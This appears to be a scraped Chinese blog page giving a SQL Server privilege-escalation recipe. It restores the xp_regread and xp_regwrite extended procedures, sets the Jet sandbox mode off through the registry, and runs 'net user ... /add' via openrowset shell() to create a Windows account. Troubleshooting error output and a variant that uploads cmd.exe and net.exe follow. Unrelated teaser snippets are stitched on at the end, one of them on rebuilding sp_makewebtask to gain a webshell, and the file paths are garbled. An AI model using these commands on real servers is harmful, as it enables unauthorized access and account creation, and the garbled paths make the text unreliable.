恢復對登錄檔的讀寫儲存。
dbcc addextendedproc (xp_regread,xpstar.dll)
dbcc addextendedproc (xp_regwrite,xpstar.dll)
修復沙盒的保護模式
exec master..xp_regwrite hkey_local_machine,softwaremicrosoftjet4.0engines,sandboxmode,reg_dword,0;--
檢視sandboxmode值是否已經變成0了。
exec master.dbo.xp_regread hkey_local_machine,softwaremicrosoftjet4.0engines, sandboxmode
最後呼叫沙盒模式
select * from openrowset(microsoft.jet.oledb.4.0,;database=c:windowssystem32iasias.mdb,select shell("net user itpro gmasfm /add"));
1.如果沙盒保護模式未「關閉」,會報錯:
伺服器: 訊息 7357,級別 16,狀態 2,行 1
未能處理物件 select shell("cmd.exe /c net user user passwd /add")。ole db 提供程式 microsoft.jet.oledb.4.0 指出該物件中沒有任何列。
ole db 錯誤跟蹤[non-inte***ce error: ole db provider unable to process object, since the object has no columnsprovidername=microsoft.jet.oledb.4.0, query=select shell("cmd.exe /c net user user passwd /add")]。
2.如果.mdb不存在或是輸入路徑錯誤
伺服器: 訊息 7399,級別 16,狀態 1,行 1
ole db 提供程式 microsoft.jet.oledb.4.0 報錯。
[ole/db provider returned message: 找不到檔案 c:windowssystem32iasdnary1.mdb。]
ole db 錯誤跟蹤[ole/db provider microsoft.jet.oledb.4.0 idbinitialize::initialize returned 0x80004005: ]。
3.如果輸入過程中多了一些空格,也會報錯。尤其要注意這點,很多人直接網上找文章複製貼上進去執行。
伺服器: 訊息 7357,級別 16,狀態 2,行 1
未能處理物件 select shell("cmd.exe /c net user user passwd /add")。ole db 提供程式 microsoft.jet.oledb.4.0 指出該物件中沒有任何列。
ole db 錯誤跟蹤[non-inte***ce error: ole db provider unable to process object, since the object has no columnsprovidername=microsoft.jet.oledb.4.0, query=select shell("cmd.exe /c net user user passwd /add")]。
4.如果mdb許可權和cmd.exe許可權不對,同樣會也出現問題。
當mdb許可權不對時,
伺服器: 訊息 7320,級別 16,狀態 2,行 1
未能對 ole db 提供程式 microsoft.jet.oledb.4.0 執行查詢。
[ole/db provider returned message: 未知]
ole db 錯誤跟蹤[ole/db provider microsoft.jet.oledb.4.0 icommandtext::execute returned 0x80040e14]。
5.如果net許可權不對時,卻沒有任何提示。
最終的提權辦法就是在當前的web目錄下面上傳系統的ias.mdb和cmd.exe,net.exe三個檔案。執行
select * from openrowset(microsoft.jet.oledb.4.0,;database=e:weias.mdb,select shell("e:webcmd.exe /c e:web
et.exe user user passwd /add"))
成功增加乙個計算機使用者。
from:zgg的空間
沙盒提權的小tips
今天剛好發現有乙個sa許可權。伺服器管理員將大部份擴充套件都刪除了。最後自己重建sp makewebtask儲存才搞到乙個webshell了。重建辦法,先找臺正常主機,sp helptext sp makewebtask,將他的sql語句重新拷到目標機器執行一次就行了 當然有了webshell,無法...
iOS沙盒 一 沙盒機制
1 ios沙盒機制 ios應用程式只能在為該改程式建立的檔案系統中讀取檔案,不可以去其它地方訪問,此區域被成為沙盒,所以所有的非 檔案都要儲存在此,例如影象,圖示,聲音,映像,屬性列表,文字檔案等。1.1 每個應用程式都有自己的儲存空間 1.2 應用程式不能翻過自己的圍牆去訪問別的儲存空間的內容 1...
解析 智慧型沙盒vs 傳統沙盒
在阻止和分析未知安全威脅方面,智慧型沙盒與普通沙盒技術之間有什麼區別?智慧型沙盒是否可用於企業?michael cobb 企業以及所有網路使用者面對的問題是如何確保反惡意軟體能夠發現並緩解最新攻擊。對於所有安全技術而言,零日漏洞利用是最具挑戰性的威脅,因為它們完全為未知,也沒有補丁,讓網路和裝置易受...